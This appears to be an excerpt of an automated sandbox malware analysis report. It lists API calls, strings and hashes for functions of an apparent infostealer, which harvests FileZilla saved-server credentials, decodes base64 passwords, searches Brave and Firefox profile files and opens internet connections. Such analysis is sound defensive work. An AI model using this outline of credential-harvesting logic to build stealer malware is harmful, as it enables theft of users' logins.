                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 00503986
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005039BF
                        • lstrcpy.KERNEL32(00000000,?), ref: 005039E7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005039F2
                        • lstrlen.KERNEL32(00521794), ref: 005039FD
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503A1A
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00503A26
                        • lstrlen.KERNEL32(?), ref: 00503A33
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503A53
                        • lstrcat.KERNEL32(00000000,?), ref: 00503A61
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503A8A
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00503ACE
                        • lstrlen.KERNEL32(?), ref: 00503AD8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503B05
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00503B10
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503B36
                        • lstrlen.KERNEL32(00521794), ref: 00503B48
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503B6A
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00503B76
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503B9E
                        • lstrlen.KERNEL32(?), ref: 00503BB2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503BD2
                        • lstrcat.KERNEL32(00000000,?), ref: 00503BE0
                        • lstrlen.KERNEL32(01038A70), ref: 00503C0B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503C31
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00503C3C
                        • lstrlen.KERNEL32(01038B10), ref: 00503C5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503C84
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00503C8F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503CB7
                        • lstrlen.KERNEL32(00521794), ref: 00503CC9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503CE8
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00503CF4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503D1A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00503D47
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00503D52
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503D79
                        • lstrlen.KERNEL32(00521794), ref: 00503D8B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503DAD
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00503DB9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503DE2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503E11
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00503E1C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503E43
                        • lstrlen.KERNEL32(00521794), ref: 00503E55
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503E77
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00503E83
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503EAC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503EDB
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00503EE6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503F0D
                        • lstrlen.KERNEL32(00521794), ref: 00503F1F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503F41
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00503F4D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503F75
                        • lstrlen.KERNEL32(?), ref: 00503F89
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503FA9
                        • lstrcat.KERNEL32(00000000,?), ref: 00503FB7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503FE0
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050401F
                        • lstrlen.KERNEL32(0103D010), ref: 0050402E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504056
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00504061
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050408A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005040CE
                        • lstrcat.KERNEL32(00000000), ref: 005040DB
                        • FindNextFileA.KERNEL32(00000000,?), ref: 005042D9
                        • FindClose.KERNEL32(00000000), ref: 005042E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 1006159827-1013718255
                        • Opcode ID: 9bd3538ccb0bf05339a2a0df402a3770be775b579d4a64526e52cc8eadf5cab8
                        • Instruction ID: f80e5330fefc52dee3f0579410c7b0150c377246f0adced8d3e7ffb2b7a85aae
                        • Opcode Fuzzy Hash: 9bd3538ccb0bf05339a2a0df402a3770be775b579d4a64526e52cc8eadf5cab8
                        • Instruction Fuzzy Hash: C162C671A1161A9BCB31AF65DD49AAF7BBDFF40304F048129F905A7290DB78DE01CB98
                        Function 00506960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506995
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 005069C8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506A02
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506A29
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00506A34
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506A5D
                        • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00506A77
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506A99
                        • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00506AA5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506AD0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506B00
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00506B35
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506B9D
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506BCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 313953988-555421843
                        • Opcode ID: 56f8af7cb159d6bafa78727ec1c14de2d0d1c123002bf733c69ecc77c03b02ca
                        • Instruction ID: 287285c7d3339ce228611b11c6bf6826d8e66cc30365a17565f721c3f5e9e9be
                        • Opcode Fuzzy Hash: 56f8af7cb159d6bafa78727ec1c14de2d0d1c123002bf733c69ecc77c03b02ca
                        • Instruction Fuzzy Hash: 2242C370A0121AABDB21ABB1DD49AAF7F79FF04704F088419FA05E7291DB78DD12CB54
                        Function 004FDB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDBC1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDBE4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDBEF
                        • lstrlen.KERNEL32(00524CA8), ref: 004FDBFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDC17
                        • lstrcat.KERNEL32(00000000,00524CA8), ref: 004FDC23
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDC4C
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDC8F
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDCBF
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 004FDCD0
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 004FDCF0
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 004FDD0A
                        • lstrlen.KERNEL32(0051CFEC), ref: 004FDD1D
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDD47
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDD70
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDD7B
                        • lstrlen.KERNEL32(00521794), ref: 004FDD86
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDDA3
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDDAF
                        • lstrlen.KERNEL32(?), ref: 004FDDBC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDDDF
                        • lstrcat.KERNEL32(00000000,?), ref: 004FDDED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDE19
                        • lstrlen.KERNEL32(00521794), ref: 004FDE3D
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FDE6F
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDE7B
                        • lstrlen.KERNEL32(010388F0), ref: 004FDE8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDEB0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDEBB
                        • lstrlen.KERNEL32(00521794), ref: 004FDEC6
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FDEE6
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDEF2
                        • lstrlen.KERNEL32(01038A40), ref: 004FDF01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDF27
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDF32
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDF5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDFA5
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDFB1
                        • lstrlen.KERNEL32(010388F0), ref: 004FDFC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDFE9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDFF4
                        • lstrlen.KERNEL32(00521794), ref: 004FDFFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE022
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FE02E
                        • lstrlen.KERNEL32(01038A40), ref: 004FE03D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE063
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FE06E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE09A
                        • StrCmpCA.SHLWAPI(?,Brave), ref: 004FE0CD
                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 004FE0E7
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FE11F
                        • lstrlen.KERNEL32(0103D010), ref: 004FE12E
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE155
                        • lstrcat.KERNEL32(00000000,?), ref: 004FE15D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE19F
                        • lstrcat.KERNEL32(00000000), ref: 004FE1A9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE1D0
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 004FE1F9
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FE22F
                        • lstrlen.KERNEL32(01038A70), ref: 004FE23D
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE261
                        • lstrcat.KERNEL32(00000000,01038A70), ref: 004FE269
                        • FindNextFileA.KERNEL32(00000000,?), ref: 004FE988
                        • FindClose.KERNEL32(00000000), ref: 004FE997
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                        • String ID: Brave$Preferences$\Brave\Preferences
                        • API String ID: 1346089424-1230934161
                        • Opcode ID: 6b909ca1b74494291fc0c4f96b7a88f1430ffc7d8b1972e832471a9ddb7786e7
                        • Instruction ID: c581a5c14479b795d4111bdf211dad6d17b4a79ac0f2103f4e064c81396263ad
                        • Opcode Fuzzy Hash: 6b909ca1b74494291fc0c4f96b7a88f1430ffc7d8b1972e832471a9ddb7786e7
                        • Instruction Fuzzy Hash: 9D528571A1120E9BDB21AF66DD89ABF77B9AF44304F044029FA0597361DB7CDC42CB58
                        Function 004F60D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F60FF
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F6152
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F6185
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F61B5
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F61F0
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F6223
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004F6233
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$InternetOpen
                        • String ID: "$------
                        • API String ID: 2041821634-2370822465
                        • Opcode ID: 1b165bd742117e62be5480d2bf18aa6f8e4231a37af4d87b77d4414f8e43f8f1
                        • Instruction ID: f721cb0fdee5da824a62dab5d5b80ef116acddb70ad7d77a718138f695520548
                        • Opcode Fuzzy Hash: 1b165bd742117e62be5480d2bf18aa6f8e4231a37af4d87b77d4414f8e43f8f1
                        • Instruction Fuzzy Hash: E3528171E0121E9BDB21EFB5DD49AAF77B9EF44300F058429FA05A7251DB78DC028B98
                        Function 00506B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506B9D
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506BCD
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506BFD
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506C2F
                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00506C3C
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00506C43
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00506C5A
                        • lstrlen.KERNEL32(00000000), ref: 00506C65
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506CA8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506CCF
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00506CE2
                        • lstrlen.KERNEL32(00000000), ref: 00506CED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506D30
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506D57
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00506D6A
                        • lstrlen.KERNEL32(00000000), ref: 00506D75
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506DB8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506DDF
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00506DF2
                        • lstrlen.KERNEL32(00000000), ref: 00506E01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506E49
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506E71
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00506E94
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00506EA8
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00506EC9
                        • LocalFree.KERNEL32(00000000), ref: 00506ED4
                        • lstrlen.KERNEL32(?), ref: 00506F6E
                        • lstrlen.KERNEL32(?), ref: 00506F81
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 2641759534-2314656281
                        • Opcode ID: ee1a57ab8dbedb0a60efc3a8b10ca1b8f29670fc0ffe936e34650e2bba96f2a8
                        • Instruction ID: 73f247c1c263e6403a7b2c1b8997b9dd73ae9a725e1873c344bf719dfcd93d5b
                        • Opcode Fuzzy Hash: ee1a57ab8dbedb0a60efc3a8b10ca1b8f29670fc0ffe936e34650e2bba96f2a8
                        • Instruction Fuzzy Hash: 8E02C270A0121AABDB20ABB1DD49EAF7FB9FF04704F049419F905E7291DB78DD128B64
                        Function 00504B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00504B51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504B74
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00504B7F
                        • lstrlen.KERNEL32(00524CA8), ref: 00504B8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504BA7
                        • lstrcat.KERNEL32(00000000,00524CA8), ref: 00504BB3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504BDE
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00504BFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: prefs.js
                        • API String ID: 2567437900-3783873740
                        • Opcode ID: 8243f22c4adc585059ffb26b98bcc1abd5db046bc1cfc3c532085a227036efa5
                        • Instruction ID: 13e684109c2ff146029e2d2e956f535dc7aef8171f3c03e178dcb6e7bb88c9c0
                        • Opcode Fuzzy Hash: 8243f22c4adc585059ffb26b98bcc1abd5db046bc1cfc3c532085a227036efa5
                        • Instruction Fuzzy Hash: 1A922A70A116068FDB24CF29D948B6EBBE5BF44314F19C0ADE9099B2A1E775DC42CF84
                        Function 00501250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00501291
